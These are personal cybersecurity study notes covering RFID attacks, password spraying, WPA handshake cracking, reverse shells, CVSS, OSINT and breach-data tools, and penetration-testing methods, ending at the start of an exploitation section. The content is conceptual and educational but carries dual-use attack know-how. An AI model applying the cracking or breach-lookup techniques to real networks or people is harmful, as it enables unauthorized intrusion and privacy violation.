Low-frequency (LF) RFID tags and devices operate at frequencies between 120kHz and 140kHz, and they exchange information at distances shorter than 3 feet. High-frequency (HF) RFID tags and devices operate at the 13.56MHz frequency and exchange information at distances between 3 and 10 feet. Ultra-high-frequency (UHF) RFID tags and devices operate at frequencies between 860MHz and 960MHz (regional) and exchange information at distances of up to 30 feet.

A few attacks are commonly launched against RFID devices:

Attackers can silently steal RFID information (such as a badge or a tag) with an RFID reader such as the Proxmark3 (https://proxmark.com) by just walking near an individual or a tag.
Attackers can create and clone an RFID tag (in a process called RFID cloning). They can then use the cloned RFID tags to enter a building or a specific room.
Attackers can implant skimmers behind RFID card readers in a building or a room.
Attackers can use amplified antennas to perform NFC amplification attacks. Attackers can also use amplified antennas to exfiltrate small amounts of data, such as passwords and encryption keys, over relatively long distances.

5.2.16 Password Spraying

Password spraying is a type of credential attack in which an attacker brute-forces logins (that is, attempts to authenticate numerous times) based on a list of usernames with default passwords of common systems or applications. For example, an attacker could try to log in with the word password1 using numerous usernames in a wordlist.

A similar attack is credential stuffing. In this type of attack, the attacker performs automated injection of usernames and passwords that have been exposed in previous breaches. You can learn more about credential stuffing attacks at https://owasp.org/www-community/attacks/Credential_stuffing.

5.2.17 Exploit Chaining

Most sophisticated attacks leverage multiple vulnerabilities to compromise systems. An attacker may “chain” (that is, use multiple) exploits against known or zero-day vulnerabilities to compromise systems, steal, modify, or corrupt data.

[Vault: Vulns & Attacks] WPA cracking

Mon, 08 Dec 2025 08:56:33 GMT

WPA/WPA2 Cracking

As mentioned above, WPA/WPA2 cracking begins by listening to Wi-Fi traffic to capture the 4-way handshake between a device and the access point. Since waiting for a device to connect or reconnect can take some time, deauthentication packets are sent to disconnect a client, forcing it to reconnect and initiate a new handshake, which is captured. After the handshake is captured, the attacker can crack the password (PSK) by using brute-force or dictionary attacks on the captured handshake file.

The WPA password cracking process involves capturing a Wi-Fi network's handshake to attempt a PSK (password) decryption. First, an attacker places their wireless adapter into monitor mode to scan for networks, then targets a specific network to capture the 4-way handshake. Once the handshake is captured, the attacker runs a brute-force or dictionary attack using a tool like aircrack-ng to attempt to match a wordlist against the passphrase.

The WPA 4-way handshake is a process that helps a client device (like your phone or laptop) and a Wi-Fi router confirm they both have the right "password" or Pre-Shared Key (PSK) before securely connecting. Here's a simplified rundown of what happens:

Router sends a challenge: The router (or access point) sends a challenge" to the client, asking it to prove it knows the network's password without directly sharing it.
Client responds with encrypted information: The client takes this challenge and uses the PSK to create an encrypted response that only the router can verify if it also has the correct PSK.
Router verifies and sends confirmation: If the router sees the client’s response matches what it expects, it knows the client has the right PSK. The router then sends its own confirmation back to the client.
Final check and connection established: The client verifies the router's response, and if everything matches, they finish setting up the secure connection.

This handshake doesn't directly reveal the PSK itself but involves encrypted exchanges that depend on the PSK.

[Vault: Web Security] Web Fundamentals

Mon, 08 Dec 2025 08:56:33 GMT

When you request a website, your computer needs to know the server's IP address it needs to talk to; for this, it uses [[DNS]]. Your computer then talks to the web server using a special set of commands called the HTTP protocol; the webserver then returns HTML, JavaScript, CSS, Images, etc., which your browser then uses to correctly format and display the website to you.

What is a website?

When you view a website in your browser (Chrome/Firefox/Safari/Edge etc.) you're actually making a request to a web server, the server then responds with a language called Hyper-Text Markup Language (HTML) which forms the layout and contents of the webpage, the HTML can also link to other files such as Cascading Style Sheets (CSS) to provide style to the website (colours, fonts, backgrounds, sizing and so much more) and then interactivity is made possible using JavaScript.

Frontend Code

Frontend code is code that is delivered by the webserver to the client and then rendered or proceeded by the browser into what you can actually see. These are languages/technologies such as HTML, CSS and JavaScript. HTML provides the content and the basic layout of the webpage. CSS (Cascading Style Sheets) adds styling to the website by providing fonts, colours, sizes and animation. JavaScript provides interactivity to a website, an example of this could be code that validates the contents of a contact form and informs the client of any errors in their input.

Backend Code

This is code which is processed on the server and generates content to be delivered back to the client. Backend code can be used to for example process user input, connect to databases or other data resources and much more.

Web Application Infrastructure

Web Server:

The most obvious piece of equipment required to host a website is the web server itself. A web server is a software that listens for incoming connections and then utilises the HTTP protocol to deliver web content to its clients. The most common web server software you'll come across is Apache, Nginx, IIS and NodeJS. A Web server delivers files from what's called its root directory, which is defined in the software settings. For example, Nginx and Apache share the same default location of /var/www/html in Linux operating systems, and IIS uses C:\inetpub\wwwroot for the Windows operating systems. So, for example, if you requested the file http://www.example.com/picture.jpg, it would send the file /var/www/html/picture.jpg from its local hard drive.

Load Balancers:

When websites start becoming more popular and experience more traffic it gets to a point where one server cannot handle the load and more are required. The traffic load between these multiple servers can be split between them using a device called a load balancer. The load balancer sits in front of the web servers and can equally share the traffic amongst them. They use different algorithms to decide which web server will receive the traffic, some of them are as follows: Round Robin: This algorithm has a set pattern, so for example, if you had three servers it would send the first request to one, then two and then three and then back round to one again and keep in this order. Sticky: This method makes sure connections are always sent to the same server by using cookies. A useful use case for this algorithm could be for uploading and then editing an image via a website. The first request uploads the image, and then because that server holds the image you need to request the same one again to make sure you still have access to it. The load balancer keeps track of your server with the use of cookies. Least Connections: This algorithm monitors how many connections already exist from the load balancers to the web servers and directs any new connections to the least connected web server. Health Checks: Load balancers also have health checks, this is a periodic request that the load balancer makes to the webserver which makes sure it is behaving properly. If the load balancer receives a predetermined amount of invalid responses from the webserver traffic will stop being directed to it. Health checks will still continue in the background until the webserver responds correctly and then traffic to it will be reinstated. N.B Headers: Sometimes web servers need to keep track of the original client that is connected to them and know information such as the client's IP address. Because the load balancer makes the connection to the webserver this information is lost, to solve this the load balancer adds extra information to the HTTP request being made. The client's IP is often found in a header called X-Forwarded-For.

CDN (Content Delivery Networks)

A CDN can be an excellent resource for cutting down traffic to a busy website. It allows you to host static files from your website, such as JavaScript, CSS, Images, Videos, and host them across thousands of servers all over the world. When a user requests one of the hosted files, the CDN works out where the nearest server is physically located and sends the request there instead of potentially the other side of the world.

Web Application Firewall (WAF)

A WAF sits in front of your web server and is used to detect and block malicious traffic. It monitors the contents of each request against pre-determined rules (these rules are usually constantly updated databases of malicious web requests) if a client's request matches any of these rules the request is dropped. It also checks if an excessive amount of web requests are being sent by utilising something called rate limiting, which will only allow a certain amount of requests from an IP per second. If a request is deemed a potential attack, it will be dropped and never sent to the webserver.

Virtual Hosts

Web servers can host multiple websites with different domain names; to achieve this, they use virtual hosts. The web server software checks the hostname being requested from the HTTP headers and matches that against its virtual hosts (virtual hosts are just text-based configuration files). If it finds a match, the correct website will be provided. If no match is found, the default website will be provided instead.

Virtual Hosts can have their root directory mapped to different locations on the hard drive. For example, one.com being mapped to /var/www/website_one, and two.com being mapped to /var/www/website_two

There's no limit to the number of different websites you can host on a web server.

Static Vs Dynamic Content

Static content, as the name suggests, is content that never changes. Common examples of this are pictures, javascript, CSS, etc., but can also include HTML that never changes. Furthermore, these are files that are directly served from the webserver with no changes made to them.

Dynamic content, on the other hand, is content that could change with different requests. Take, for example, a blog. On the homepage of the blog, it will show you the latest entries. If a new entry is created, the home page is then updated with the latest entry, or a second example might be a search page on a blog. Depending on what word you search, different results will be displayed.

These changes to what you end up seeing are done in what is called the Backend with the use of programming and scripting languages. It's called the Backend because what is being done is all done behind the scenes. You can't view the websites' HTML source and see what's happening in the Backend, while the HTML is the result of the processing from the Backend. Everything you see in your browser is called the Frontend.

Scripting and Backend Languages

There's not much of a limit to what a backend language can achieve, and these are what make a website interactive to the user. Some examples of these languages are PHP, Python, Ruby, NodeJS, Perl and many more. These languages can interact with databases, call external services, process data from the user, and so much more.

[[Web Sessions]]

[Vault: GRC] Security Frameworks

Mon, 08 Dec 2025 05:21:24 GMT

Security frameworks and controls

Security frameworks are guidelines used for building plans to help mitigate risks and threats to data and privacy. Purpose of security frameworks

Protecting PII
Securing financial information
Identifying security weaknesses
Managing organizational risks
Aligning security with business goals Core components of security frameworks

Identifying and documenting security goals
Setting guidelines to achieve security goals
Implementing security processes
Monitoring and communicating results

Security frameworks are about:

Governance (e.g., ISO 27001, COBIT)
Risk Management (e.g., NIST RMF, FAIR)
Compliance (e.g., HIPAA, PCI-DSS)
Controls and Standards (e.g., CIS, NIST CSF)
Threat modeling and mapping (e.g., MITRE ATT&CK)

[[CIA Triad]]

NIST Cybersecurity Framework (CSF)

A voluntary framework that consists of standards, guidelines, and best practices to manage cybersecurity risk. NIST CSF components: Core, Tiers, Profiles

Core

The CSF core is a set of desired cybersecurity outcomes that help organizations customize their security plan. It consists of six functions, or parts: Identify, Protect, Detect, Respond, Recover, and Govern.

Identify: management of cybersecurity risk and its effect on an organization's people and assets.
Protect: The strategy used to protect an organization through the implementation of policies, procedures, training, and tools that help mitigate cybersecurity threats.
Detect: Identifying potential security incidents and improving monitoring capabilities to increase the speed and efficiency of detections.
Respond: Making sure that the proper procedures are used to contain, neutralize, and analyze security incidents, and implement improvements to the security process.
Recover: The process of returning affected systems back to normal operation.
Govern

Tiers

The CSF tiers are a way of measuring the sophistication of an organization's cybersecurity program. CSF tiers are measured on a scale of 1 to 4. Tier 1 is the lowest score, indicating that a limited set of security controls have been implemented. Overall, CSF tiers are used to assess an organization's security posture and identify areas for improvement.

Profiles

The CSF profiles are pre-made templates of the NIST CSF that are developed by a team of industry experts. CSF profiles are tailored to address the specific risks of an organization or industry. They are used to help organizations develop a baseline for their cybersecurity plans, or as a way of comparing their current cybersecurity posture to a specific industry standard.

Implementing the CSF

Create a current profile of the security operations and outline the specific needs of your business.
Perform a risk assessment to identify which of your current operations are meeting business and regulatory standards.
Analyze and prioritize existing gaps in security operations that place the businesses assets at risk.
Implement a plan of action to achieve your organization’s goals and objectives.

The NIST CSF also expands into the protection of the United States federal government with NIST special publication, or SP 800-53. It provides a unified framework for protecting the security of information systems within the federal government, including the systems provided by private companies for federal government use.

Other frameworks

NIST Risk Management Framework (RMF)
The Federal Energy Regulatory Commission - North American Electric Reliability Corporation (FERC-NERC)
The Federal Risk and Authorization Management Program (FedRAMP®)
Center for Internet Security (CIS®)
General Data Protection Regulation (GDPR) GDPR is a European Union (E.U.) general data regulation that protects the processing of E.U. residents’ data and their right to privacy in and out of E.U. territory.
Payment Card Industry Data Security Standard (PCI DSS)
The Health Insurance Portability and Accountability Act (HIPAA) - 1996
International Organization for Standardization (ISO)
System and Organizations Controls (SOC type 1, SOC type 2) The American Institute of Certified Public Accountants® (AICPA) auditing standards board developed this standard. The SOC1 and SOC2 are a series of reports that focus on an organization's user access policies at different organizational levels.

Cyber Threat Framework (CTF)

According to the Office of the Director of National Intelligence, the CTF was developed by the U.S. government to provide “a common language for describing and communicating information about cyber threat activity.” By providing a common language to communicate information about threat activity, the CTF helps cybersecurity professionals analyze and share information more efficiently. This allows organizations to improve their response to the constantly evolving cybersecurity landscape and threat actors' many tactics and techniques.

International Organization for Standardization/International Electrotechnical Commission (ISO/IEC) 27001

An internationally recognized and used framework is ISO/IEC 27001. The ISO 27000 family of standards enables organizations of all sectors and sizes to manage the security of assets, such as financial information, intellectual property, employee data, and information entrusted to third parties. This framework outlines requirements for an information security management system, best practices, and controls that support an organization’s ability to manage risks. Although the ISO/IEC 27001 framework does not require the use of specific controls, it does provide a collection of controls that organizations can use to improve their security posture.

[Vault: GRC] Threats

Mon, 08 Dec 2025 05:21:24 GMT

A threat is any circumstance or event that can negatively impact assets.

People are the biggest threat to a company’s security. This is why educating employees about security challenges is essential for minimizing the possibility of a breach.

Threat actor types

Advanced persistent threats

Advanced persistent threats (APTs) have significant expertise accessing an organization's network without authorization. APTs tend to research their targets (e.g., large corporations or government entities) in advance and can remain undetected for an extended period of time. Their intentions and motivations can include:

Damaging critical infrastructure, such as the power grid and natural resources
Gaining access to intellectual property, such as trade secrets or patents

Insider threats

Insider threats abuse their authorized access to obtain data that may harm an organization. Their intentions and motivations can include:

Sabotage
Corruption
Espionage
Unauthorized data access or leaks Shadow IT refers to individuals who use technologies that lack IT governance. A common example is when an employee uses their personal email to send work-related communications.

Hacktivists

Hacktivists are threat actors that are driven by a political agenda. They abuse digital technology to accomplish their goals, which may include:

Demonstrations
Propaganda
Social change campaigns
Fame

Attack vectors

An attack vector refers to the pathways attackers use to penetrate security defenses; an attack surface refers to all the vulnerabilities of an asset that can be exploited.

Direct access, referring to instances when they have physical access to a system
Removable media, which includes portable hardware, like USB flash drives
Social media platforms that are used for communication and content sharing
Email, including both personal and business accounts
Wireless networks on premises
Cloud services usually provided by third-party organizations
Supply chains like third-party vendors that can present a backdoor into systems

Threat Modeling

A typical threat modeling process is performed in a cycle:

Define the scope
Identify threats
Characterize the environment
Analyze threats
Mitigate risks
Evaluate findings

Threat modeling frameworks

STRIDE

STRIDE is a threat-modeling framework developed by Microsoft. It’s commonly used to identify vulnerabilities in six specific attack vectors. The acronym represents each of these vectors: spoofing, tampering, repudiation, information disclosure, denial of service, and elevation of privilege.

PASTA (Process for Attack Simulation and Threat Analysis)

The Process of Attack Simulation and Threat Analysis (PASTA) is a risk-centric threat modeling process developed by two OWASP leaders and supported by a cybersecurity firm called VerSprite. Its main focus is to discover evidence of viable threats and represent this information as a model. PASTA's evidence-based design can be applied when threat modeling an application or the environment that supports that application. Its seven stage process consists of various activities that incorporate relevant security artifacts of the environment, like vulnerability assessment reports. Steps:

Define business and security objectives
Define the technical scope
Decompose the application
Perform a threat analysis
Perform a vulnerability analysis
Conduct attack modeling

Trike

Trike is an open source methodology and tool that takes a security-centric approach to threat modeling. It's commonly used to focus on security permissions, application use cases, privilege models, and other elements that support a secure environment.

VAST

The Visual, Agile, and Simple Threat (VAST) Modeling framework is part of an automated threat-modeling platform called ThreatModeler®. Many security teams opt to use VAST as a way of automating and streamlining their threat modeling assessments.

[Vault: System Security] Reverse shell

Mon, 08 Dec 2025 05:21:24 GMT

A shell is a utility (software) that acts as an interface between a user and the operating system (the kernel and its services). For example, in Linux there are several shell environments, such as Bash, ksh, and tcsh. Traditionally, in Windows the shell is the command prompt (command-line interface), which is invoked by cmd.exe. Windows PowerShell is a newer Microsoft shell that combines the old CMD functionality with a new scripting/cmdlet instruction set with built-in system administration functionality. PowerShell cmdlets allow users and administrators to automate complicated tasks with reusable scripts.

Bind shell

With a bind shell, an attacker opens a port or a listener on the compromised system and waits for a connection. This is done in order to connect to the victim from any system and execute commands and further manipulate the victim.

Reverse shell

A reverse shell is a vulnerability in which an attacking system has a listener (port open), and the victim initiates a connection back to the attacking system.

Many tools allow you to create bind and reverse shells from a compromised host. Some of the most popular ones are the Meterpreter module in Metasploit and Netcat. Netcat is one of the best and most versatile tools for pen testers because it is lightweight and very portable.

[[Netcat]]
[[Metasploit#Meterpreter|Meterpreter]]

[Vault: Offensive Security] CVE, CWE, CVSS

Sun, 07 Dec 2025 05:23:47 GMT

CVE

The Common Vulnerabilities and Exposures (CVE) is a list of publicly known vulnerabilities; each is assigned an ID number, description, and reference. Common Vulnerabilities and Exposures (CVE) is an effort that reaches across international cybersecurity communities. It was created in 1999 with the idea of consolidating cybersecurity tools and databases. A CVE ID is composed of the letters CVE followed by the year of publication and four or more digits in the sequence number portion of the ID (for example, CVE-YYYY-NNNN with four digits in the sequence number, CVE-YYYY-NNNNN with five digits in the sequence number, CVE-YYYY-NNNNNNN with seven digits in the sequence number, and so on).

CVE Numbering Authority (CNA): An organization that volunteers to analyze and distribute information on eligible CVEs

CVE™ list criteria:

Independent of other issues
Recognized as a potential security risk
Submitted with supporting evidence
Only affect one codebase

CWE

Common Weakness Enumeration (CWE), at a high level, is a list of software weaknesses. The purpose of CWE is to create a common language to describe software security weaknesses that are the root causes of given vulnerabilities. CWE provides a common baseline for weakness identification to aid the mitigation process. You can obtain additional information about CWE at MITRE’s site: https://cwe.mitre.org

CVSS

Each vulnerability represents a potential risk that threat actors can use to compromise your systems and your network. Each vulnerability carries an associated amount of risk. One of the most widely adopted standards ==for calculating the severity of a given vulnerability== is the Common Vulnerability Scoring System (CVSS), which has three components: base, temporal, and environmental scores. Each component is presented as a score on a scale from 0 to 10. CVSS is an industry standard maintained by the Forum of Incident Response and Security Teams (FIRST) that is used by many Product Security Incident Response Teams (PSIRTs) to convey information about the severity of vulnerabilities they disclose to their customers. In CVSS, a vulnerability is evaluated according to three aspects, with a score assigned to each of them:

Base group

The base group represents the intrinsic characteristics of a vulnerability that are constant over time and do not depend on a user-specific environment. This is the most important information and the only aspect that’s mandatory to obtain a vulnerability score. Includes exploitability metrics (for example, attack vector, attack complexity, privileges required, user interaction) and impact metrics (for example, confidentiality impact, integrity impact, availability impact). In addition to these two metrics, a metric called Scope Change (S) is used to convey the impact on other systems that may be impacted by the vulnerability but do not contain the vulnerable code. For instance, if a router is susceptible to a DoS vulnerability and experiences a crash after receiving a crafted packet from the attacker, the scope is changed, since the devices behind the router will also experience the denial-of-service condition.

Temporal metric group

The temporal group assesses the vulnerability as it changes over time.
Includes exploit code maturity, remediation level, and report confidence.

Environmental group

The environmental group represents the characteristics of a vulnerability, taking into account the organizational environment. Includes modified base metrics, confidentiality, integrity, and availability requirements.

CVSS includes different metrics and measures that describe the impact of each vulnerability. This risk prioritization can help your customer understand the business impact (business impact analysis) of the vulnerabilities that you found during the penetration testing engagement. You can find full explanations of the CVSS metric groups as well as details on how to calculate scores by accessing the Common Vulnerability Scoring System User Guide at https://www.first.org/cvss/user-guide.

The score for the base group is between 0 and 10, where 0 is the least severe and 10 is assigned to highly critical vulnerabilities. For example, a highly critical vulnerability could allow an attacker to remotely compromise a system and get full control. In addition, the score comes in the form of a vector string that identifies each of the components used to make up the score. The formula used to obtain the score takes into account various characteristics of the vulnerability and how the attacker is able to leverage these characteristics.

FIRST provides additional examples at https://www.first.org/cvss/.
CVSS 3.1 Calculator at https://www.first.org/cvss/calculator/3.1

The Open Web Application Security Project (OWASP) publishes the Risk Rating Methodology to help with estimating the risk of a vulnerability as it pertains to a business. It is part of the OWASP Testing Guide, at https://owasp.org/www-project-web-security-testing-guide.

[Vault: Offensive Security] OSINT

Sun, 07 Dec 2025 05:23:47 GMT

OSINT (Open-source intelligence) is the collection and analysis of information from publicly available sources to generate usable intelligence. It's commonly used to support cybersecurity activities, like identifying potential threats and vulnerabilities.

Google Dorking

| Operator | Description | | ---------- | ------------------------------------------------------------------------------ | | allintext: | Restricts results to pages with all query words in the page text. | | filetype: | Restricts results to pages of the specified file type (.pdf, .ppt, .doc, etc.) | | intitle: | Restricts results to pages with a certain word (or words) in the title. | | inurl: | Restricts results to pages with a certain word (or words) in the URL. | | site: | Restricts results to pages from the specified domain. | The GHDB is an index of search queries (we call them dorks) used to find publicly available information, intended for pentesters and security researchers. It is an index of user-created dorks that are designed to uncover interesting, and potentially sensitive, information that was unintentionally made publicly available on the internet.

Other Tools

Sherlock : is an osint tool for searching a particular user id in all the available social media platforms
R3C0Nizer
Osintgram
theHarvester : is a simple to use, yet powerful tool designed to be used during the reconnaissance stage of a red team assessment or penetration test. It performs open source intelligence (OSINT) gathering to help determine a domain's external threat landscape.
Maltego :is an open source intelligence and forensics application. It will offer you timous mining and gathering of information as well as the representation of this information in a easy to understand format.
The OSINT Framework :is a useful way to visualize the OSINT tools and resources that are available.
VirusTotal :is a service that allows anyone to analyze suspicious files, domains, URLs, and IP addresses for malicious content.
MITRE ATT&CK® : is a knowledge base of adversary tactics and techniques based on real-world observations.
Have I been Pwned : is a tool that can be used to search for breached email accounts.

SpiderFoot

SpiderFoot is an automated OSINT scanner. It is included with Kali. SpiderFoot queries over 1000 open-information sources and presents the results in an easy-to-use GUI. SpiderFoot can also be run from a console. SpiderFoot seeds its scan with one of the following:

Domain names
IP addresses
Subnet addresses
Autonomous System Numbers (ASN)
Email addresses
Phone numbers
Personal names SpiderFoot offers the option of choosing scans based on use case, required data, and by SpiderFoot module. The use cases are:
All – Get every possible piece of information about the target. This use case can take a very long time to complete.
Footprint – Understand the target’s network perimeter, associated identities and other information that is yielded by extensive web crawling and search engine use.
Investigate – This is or targets that you suspect of malicious behavior. Footprinting, blacklist lookups, and other sources that report on malicious sites will be returned.
Passive – This type of scan is used if it is undesirable for the target to suspect that it is being scanned. This is a form of passive OSINT.
[[recon-ng]]

Discovering email addresses

hunter.io
phonebook.cz
voilanorbert.com
clearbit connect extension in gmail To verify email address
emailhippo - (tools.verifyemailaddress.io)
email-checker.net/validate

find web app infos / Fingerprinting

wappalyser extension
react developer tools
https://w3techs.com
builtwith
whatweb
- tool built in kali
wpscan
- to get info wordpress web apps
- wpscan --url [url] -e ap --plugin-detection aggressive
Netcat
Nmap
Censys2 Censys, a tool developed by researchers at the University of Michigan, can be used for passive reconnaissance to find information about devices and networks on the Internet. It can be accessed at https://censys.io. Censys provides a free web and API access plan that limits the number of queries a user can perform. It also provides several other paid plans that allow for premium support and additional queries.

Finding Information from SSL Certificates

During the reconnaissance phase, attackers often can inspect Secure Sockets Layer (SSL) certificates to obtain information about the organization, potential cryptographic flaws, and weak implementations. You can find a lot inside digital certificates: the certificate serial number, the subject common name, the uniform resource identifier (URI) of the server it was assigned to, the organization name, Online Certificate Status Protocol (OCSP) information, the certificate revocation list (CRL) URI, and so on.

Certificate Transparency (CT) is an open framework for monitoring and auditing the issuance of SSL/TLS certificates. CT requires that all publicly trusted certificate authorities (CAs) log all issued certificates in publicly available, tamper-evident, and auditable logs. These logs can be monitored to detect any fraudulent or malicious issuance of SSL/TLS certificates, including certificates issued for domains that the attacker does not control. https://crt.sh/

| Tool | Description | Recon, Exploitation, or Utility | | -------- | ------------------------------------------------------------- | ------------------------------- | | sslscan | Queries SSL services to determine what cyphers are supported | Reconnaissance | | ssldump | Analyze and decode SSL traffic | Exploitation | | sslh | Running multiple services on port 443 | Utility | | sslsplit | Enable MitM attacks on SSL encrypted network connections | Exploitation | | sslyze | Analyze the SSL configuration of a server by connecting to it | Reconnaissance | use sslscan to gather information about certificates and use another utility, called aha, to output the results to an HTML file.

File Metadata

You can obtain a lot of information from metadata in files such as images, Microsoft Word documents, Excel files, PowerPoint files, and more. For instance, Exchangeable Image File Format (Exif) is a specification that defines the formats for images, sound, and supplementary tags used by digital cameras, mobile phones, scanners, and other systems that process image and sound files.

Exiftool
FOCA Fingerprinting Organization with Collected Archives (FOCA) is a tool designed to find metadata and hidden information in documents. FOCA can analyze websites as well as Microsoft Office, Open Office, PDF, and other documents. You can download FOCA from https://github.com/ElevenPaths/FOCA. FOCA analyzes files by extracting EXIF (exchangeable image file format) information from graphics files, as well as information discovered through the URL of a scanned website.

Password OSINT

Gathering breached passwords

Using Breach-parse
- this is ~44gb
- not required/recommended
Using Dehashed
- paid subscription required
Weleakinfo
- maybe shutdown
Hashes.org
HavelBeenPwned

Breaches

tools that allow you to search for breach data dumps:

h8mail
WhatBreach: https://github.com/Ekultek/WhatBreach
LeakLooker: https://github.com/woj-ciech/LeakLooker
Buster: https://github.com/sham00n/buster
Scavenger: https://github.com/rndinfosecguy/Scavenger
PwnDB: https://github.com/davidtavarez/pwndb

Several online services provide the ability to search on individual email addresses and entire domains to reveal breaches. Some of those sites are:

haveibeenpwned.com
f-secure.com
hacknotice.com
breachdirectory.com
keepersecurity.com

Shodan

Shodan is an organization that scans the Internet 24 hours a day, 365 days a year. The results of those scans are stored in a database that can be queried at shodan.io or by using an API. You can use Shodan to query for vulnerable hosts, Internet of Things (IoT) devices, and many other systems that should not be exposed or connected to the public Internet. Figure 3-5 shows different categories of systems found by Shodan scans, including industrial control systems (ICS), databases, network infrastructure devices, and video games. Shodan is a search engine for devices connected to the Internet.

[Vault: Offensive Security] Penetration Testing

Sun, 07 Dec 2025 05:23:47 GMT

A penetration test, colloquially known as a pentest, is an authorized simulated cyberattack on a computer system, performed to evaluate the security of the system. The test is performed to identify weaknesses (or vulnerabilities), including the potential for unauthorized parties to gain access to the system's features and data,as well as strengths, enabling a full risk assessment to be completed.

Penetration testing, commonly known as pen testing, is the act of assessing a computer system, network or organization for security vulnerabilities. A pen test seeks to breach systems, people, processes and code to uncover vulnerabilities which could be exploited. This information is then used to improve the system’s defenses to ensure that it is better able to withstand cyber attacks in the future.

The term ethical hacker describes a person who acts as an attacker and evaluates the security posture of a computer network for the purpose of minimizing risk. The NIST Computer Security Resource Center (CSRC) defines a hacker as an “unauthorized user who attempts to or gains access to an information system.”

Different approaches to penetration testing

Red team tests simulate attacks to identify vulnerabilities in systems, networks, or applications.
Blue team tests focus on defense and incident response to validate an organization's existing security systems.
Purple team tests are collaborative, focusing on improving the security posture of the organization by combining elements of red and blue team exercises.

Penetration testing methods

Unknown-Environment Test (White Box Testing)

In an unknown-environment penetration test, the tester is typically provided only a very limited amount of information. For instance, the tester may be provided only the domain names and IP addresses that are in scope for a particular target. The idea of this type of limitation is to have the tester start out with the perspective that an external attacker might have. Typically, an attacker would first determine a target and then begin to gather information about the target, using public information, and gain more and more information to use in attacks. The tester would not have prior knowledge of the target’s organization and infrastructure. Another aspect of unknown-environment testing is that sometimes the network support personnel of the target may not be given information about exactly when the test is taking place. This allows for a defense exercise to take place as well, and it eliminates the issue of a target preparing for the test and not giving a real-world view of how the security posture really looks.

Known-Environment Test (White Box Testing)

In a known-environment penetration test, the tester starts out with a significant amount of information about the organization and its infrastructure. The tester would normally be provided things like network diagrams, IP addresses, configurations, and a set of user credentials. If the scope includes an application assessment, the tester might also be provided the source code of the target application. The idea of this type of test is to identify as many security holes as possible. In an unknown-environment test, the scope may be only to identify a path into the organization and stop there. With known-environment testing, the scope is typically much broader and includes internal network configuration auditing and scanning of desktop computers for defects. Time and money are typically deciding factors in the determination of which type of penetration test to complete. If a company has specific concerns about an application, a server, or a segment of the infrastructure, it can provide information about that specific target to decrease the scope and the amount of time spent on the test but still uncover the desired results. With the sophistication and capabilities of adversaries today, it is likely that most networks will be compromised at some point, and a white-box approach is not a bad option.

Partially Known Environment Test (Grey Box Testing)

A partially known environment penetration test is somewhat of a hybrid approach between unknown- and known-environment tests. With partially known environment testing, the testers may be provided credentials but not full documentation of the network infrastructure. This would allow the testers to still provide results of their testing from the perspective of an external attacker’s point of view. Considering the fact that most compromises start at the client and work their way throughout the network, a good approach would be a scope where the testers start on the inside of the network and have access to a client machine. Then they could pivot throughout the network to determine what the impact of a compromise would be.

Different types of penetration tests

Network Infrastructure Tests

Testing of the network infrastructure can mean a few things. For the purposes of this course, we say it is focused on evaluating the security posture of the actual network infrastructure and how it is able to help defend against attacks. This often includes the switches, routers, firewalls, and supporting resources, such as authentication, authorization, and accounting (AAA) servers and IPSs. A penetration test on wireless infrastructure may sometimes be included in the scope of a network infrastructure test. However, additional types of tests beyond a wired network assessment would be performed. For instance, a wireless security tester would attempt to break into a network via the wireless network either by bypassing security mechanisms or breaking the cryptographic methods used to secure the traffic. Testing the wireless infrastructure helps an organization to determine weaknesses in the wireless deployment as well as the exposure. It often includes a detailed heat map of the signal disbursement.

External Network Pentest

Assessing an organisation's security from outside looking in
Methodology focuses heavily on Open-Source Intelligence (OSINT) Gathering
Typically lasts 32-40 hour with another 8-16 for report writing

Internal Network Pentest

Assessing an organization's security from inside of the network
Methodology focuses heavily on Active Directory attacks
Typically lasts 32-40 hours with another 8-16 for report writing

Application-Based Tests

This type of pen testing focuses on testing for security weaknesses in enterprise applications. These weaknesses can include but are not limited to misconfigurations, input validation issues, injection issues, and logic flaws. Because a web application is typically built on a web server with a back-end database, the testing scope normally includes the database as well. However, it focuses on gaining access to that supporting database through the web application compromise. A great resource that we mention a number of times in this book is the Open Web Application Security Project (OWASP).

Web Application Pentest

Assessing an organization's web application security
Methodology focuses heavily on web-based attacks and the OWASP testing guidelines
Typically lasts 32-40 hours with another 8-16 for report writing

Penetration Testing in the Cloud

Cloud service providers (CSPs) such as Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP) have no choice but to take their security and compliance responsibilities very seriously. For instance, Amazon created the Shared Responsibility Model to describe the AWS customers’ responsibilities and Amazon’s responsibilities in detail (see https://aws.amazon.com/compliance/shared-responsibility-model).

The responsibility for cloud security depends on the type of cloud model (software as a service [SaaS], platform as a service [PaaS], or infrastructure as a service [IaaS]). For example, with IaaS, the customer (cloud consumer) is responsible for data, applications, runtime, middleware, virtual machines (VMs), containers, and operating systems in VMs. Regardless of the model used, cloud security is the responsibility of both the client and the cloud provider. These details need to be worked out before a cloud computing contract is signed. These contracts vary depending on the security requirements of the client. Considerations include disaster recovery, service-level agreements (SLAs), data integrity, and encryption. For example, is encryption provided end to end or just at the cloud provider? Also, who manages the encryption keys–the CSP or the client?

Overall, you want to ensure that the CSP has the same layers of security (logical, physical, and administrative) in place that you would have for services you control. When performing penetration testing in the cloud, you must understand what you can do and what you cannot do. Most CSPs have detailed guidelines on how to perform security assessments and penetration testing in the cloud. Regardless, there are many potential threats when organizations move to a cloud model. For example, although your data is in the cloud, it must reside in a physical location somewhere. Your cloud provider should agree in writing to provide the level of security required for your customers. As an example, the following link includes the AWS Customer Support Policy for Penetration Testing: https://aws.amazon.com/security/penetration-testing.

Wireless Pentest

Assessing an organization's wireless network security
Methodology depends on wireless type being used (guest vs WPA2-PSK vs WPA2 Enterprise)
Typically lasts 4-8 hours per SSID with another 2-4 for report writing

Physical Pentest & Social Engineering

Assessing an organization's physical security and/or enduser training
Methodology depends on task and goals
Typically lasts 16-40 hours with another 4-8 for report writing

Other Assessments

Mobile Penetration Testing
loT Penetration Testing
Red Team Engagements
Purple Team Engagements

Stages

Step 1: Planning / Information Gathering

The pen tester gathers as much information as possible about a target system or network, its potential vulnerabilities and exploits to use against it. This involves conducting passive (OSINT) or active reconnaissance (footprinting) and vulnerability research.

Step 2: Scanning / Enumeration

This stage involves discovering applications and services running on the systems. For example, finding a web server that may be potentially vulnerable. The pen tester carries out active reconnaissance to probe a target system or network and identify potential weaknesses which, if exploited, could give an attacker access. Active reconnaissance may include:

port scanning to identify potential access points into a target system
vulnerability scanning to identify potential exploitable vulnerabilities of a particular target
establishing an active connection to a target (enumeration) to identify the user account, system account and admin account.

Step 3: Exploitation / Gaining access

